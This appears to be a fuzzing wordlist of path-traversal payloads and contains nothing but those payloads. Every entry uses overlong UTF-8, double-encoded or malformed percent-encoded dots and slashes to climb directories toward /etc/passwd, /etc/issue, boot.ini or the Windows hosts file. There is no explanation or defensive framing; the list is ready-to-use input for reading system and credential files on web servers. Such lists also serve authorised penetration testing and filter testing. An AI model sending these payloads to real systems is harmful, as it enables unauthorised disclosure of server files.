-%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fetc0x2fpasswd -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fetc0x2fissue -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fboot.ini -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fetc0x2fpasswd -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fetc0x2fissue -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fboot.ini -%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2f%c0%2e%c0%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%2e%c0%2e0x5cetc0x5cpasswd -%c0%2e%c0%2e0x5cetc0x5cissue -%c0%2e%c0%2e0x5cboot.ini -%c0%2e%c0%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cetc0x5cpasswd -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cetc0x5cissue -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cboot.ini -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cetc0x5cpasswd -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cetc0x5cissue -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cboot.ini -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cetc0x5cpasswd -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cetc0x5cissue -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cboot.ini -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cetc0x5cpasswd -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cetc0x5cissue -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cboot.ini -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cetc0x5cpasswd -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cetc0x5cissue -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cboot.ini -%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5c%c0%2e%c0%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%2e%c0%2e%252fetc%252fpasswd -%c0%2e%c0%2e%252fetc%252fissue -%c0%2e%c0%2e%252fboot.ini -%c0%2e%c0%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fetc%252fpasswd -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fetc%252fissue -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fboot.ini -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fetc%252fpasswd -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fetc%252fissue -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fboot.ini -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fetc%252fpasswd -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fetc%252fissue -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fboot.ini -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fetc%252fpasswd -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fetc%252fissue -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fboot.ini -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fetc%252fpasswd -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fetc%252fissue -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fboot.ini -%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252f%c0%2e%c0%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%2e%c0%2e%255cetc%255cpasswd -%c0%2e%c0%2e%255cetc%255cissue -%c0%2e%c0%2e%255cboot.ini -%c0%2e%c0%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cetc%255cpasswd -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cetc%255cissue -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cboot.ini -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cetc%255cpasswd -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cetc%255cissue -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cboot.ini -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cetc%255cpasswd -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cetc%255cissue -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cboot.ini -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cetc%255cpasswd -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cetc%255cissue -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cboot.ini -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cetc%255cpasswd -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cetc%255cissue -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cboot.ini -%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255c%c0%2e%c0%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd -%c0%2e%c0%2e%c0%2fetc%c0%2fissue -%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fissue -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fissue -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fissue -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fissue -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fissue -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%2e%c0%2e%c0%afetc%c0%afpasswd -%c0%2e%c0%2e%c0%afetc%c0%afissue -%c0%2e%c0%2e%c0%afboot.ini -%c0%2e%c0%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afpasswd -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afissue -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afboot.ini -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afpasswd -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afissue -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afboot.ini -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afpasswd -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afissue -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afboot.ini -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afpasswd -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afissue -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afboot.ini -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afpasswd -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afissue -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afboot.ini -%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%2e%c0%2e%c0%5cetc%c0%5cpasswd -%c0%2e%c0%2e%c0%5cetc%c0%5cissue -%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%c0%5cpasswd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%c0%5cissue -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%c0%5cpasswd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%c0%5cissue -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%c0%5cpasswd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%c0%5cissue -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%c0%5cpasswd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%c0%5cissue -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%c0%5cpasswd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%c0%5cissue -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%2e%c0%2e%c1%9cetc%c1%9cpasswd -%c0%2e%c0%2e%c1%9cetc%c1%9cissue -%c0%2e%c0%2e%c1%9cboot.ini -%c0%2e%c0%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cetc%c1%9cpasswd -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cetc%c1%9cissue -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cboot.ini -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cetc%c1%9cpasswd -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cetc%c1%9cissue -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cboot.ini -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cetc%c1%9cpasswd -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cetc%c1%9cissue -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cboot.ini -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cetc%c1%9cpasswd -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cetc%c1%9cissue -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cboot.ini -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cetc%c1%9cpasswd -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cetc%c1%9cissue -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cboot.ini -%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9c%c0%2e%c0%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%2e%c0%2e%c1%pcetc%c1%pcpasswd -%c0%2e%c0%2e%c1%pcetc%c1%pcissue -%c0%2e%c0%2e%c1%pcboot.ini -%c0%2e%c0%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcetc%c1%pcpasswd -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcetc%c1%pcissue -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcboot.ini -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcetc%c1%pcpasswd -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcetc%c1%pcissue -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcboot.ini -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcetc%c1%pcpasswd -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcetc%c1%pcissue -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcboot.ini -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcetc%c1%pcpasswd -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcetc%c1%pcissue -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcboot.ini -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcetc%c1%pcpasswd -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcetc%c1%pcissue 